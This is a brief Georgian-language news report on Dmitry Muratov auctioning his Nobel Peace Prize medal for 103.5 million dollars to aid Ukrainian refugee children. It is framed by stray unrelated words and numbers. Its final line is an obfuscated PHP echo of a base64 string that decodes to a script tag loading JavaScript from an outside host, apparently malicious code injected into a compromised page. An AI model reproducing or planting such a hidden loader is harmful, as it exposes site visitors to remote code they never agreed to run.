celsiusi
ავერსი საქკაბელი
რუსმა ჟურნალისტმა, დამოუკიდებელ გაზეთ "ნოვაია გაზეტას" მთავარმა რედაქტორმა, დიმიტრი მურატოვმა მშვიდობის დარგში მიღებული ნობელის პრემია აუქციონზე 103.5 მილიონ დოლარად გაიტანა.
 
დიმიტრი მურატოვმა თქვა, რომ გაყიდვიდან შემოსული თანხა უკრაინაში ლტოლვილ ბავშვებს მოხმარდება.
 
მურატოვს 2021 წელს მშვიდობის დარგში პრემია მიენიჭა რუსეთში გამოხატვის თავისუფლების დაცვისთვის. "ნოვაია გაზეტამ" თავისი საქმიანობა მარტში, უკრაინაში რუსეთის შეჭრიდან მალევე შეაჩერა.
 
Heritage Auctions-მა, რომელმაც გაყიდვა ჩაატარა, არ დაასახელა ვინ იყო გამარჯვებული პრეტენდენტი.
552
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");